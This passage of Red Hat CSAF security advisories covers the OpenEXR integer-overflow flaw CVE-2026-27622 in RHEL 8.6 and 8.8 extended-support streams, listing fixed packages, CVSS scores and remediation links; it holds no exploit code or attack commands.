"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.TUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-27622",
"cwe": {
"id": "CWE-190",
"name": "Integer Overflow or Wraparound"
},
"discovery_date": "2026-03-03T23:02:15.379586+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2444251"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-27622"
},
{
"category": "external",
"summary": "RHBZ#2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-27622",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27622"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27622"
},
{
"category": "external",
"summary": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963",
"url": "https://github.com/AcademySoftwareFoundation/openexr/security/advisories/GHSA-cr4v-6jm6-4963"
}
],
"release_date": "2026-03-03T22:42:49.086000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-30T16:02:14+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:12338"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:12339
Vulnerability from csaf_redhat - Published: 2026-04-30 15:26 - Updated: 2026-06-30 04:26Summary
Red Hat Security Advisory: OpenEXR security update
Severity
Important
Notes
Topic: An update for OpenEXR is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
Details: OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light & Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format.
Security Fix(es):
* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
7.4 (High)
Affected products
Fixed
39 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-0:2.2.0-12.el8_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.AUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.aarch64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_6.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.6.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
Threats
Impact
Important
References
9 references
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.6 Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.6 Update Services for SAP Solutions, and Red Hat Enterprise Linux 8.6 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12339",
"url": "https://access.redhat.com/errata/RHSA-2026:12339"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12339.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-06-30T04:26:54+00:00",
"generator": {
"date": "2026-06-30T04:26:54+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "5.3.0"
}
},
"id": "RHSA-2026:12339",
"initial_release_date": "2026-04-30T15:26:09+00:00",
"revision_history": [
{
"date": "2026-04-30T15:26:09+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T15:26:09+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-06-30T04:26:54+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream AUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.AUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_aus:8.6::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.6)",
"product_id": "AppStream-8.6.0.Z.E4S",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_e4s:8.6::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product": {
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.6)",
"product_id": "AppStream-8.6.0.Z.TUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_tus:8.6::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_6.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_6.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_6.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_6.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_6.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_6.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_6.1.x86_64",
"product_identification_helper": {
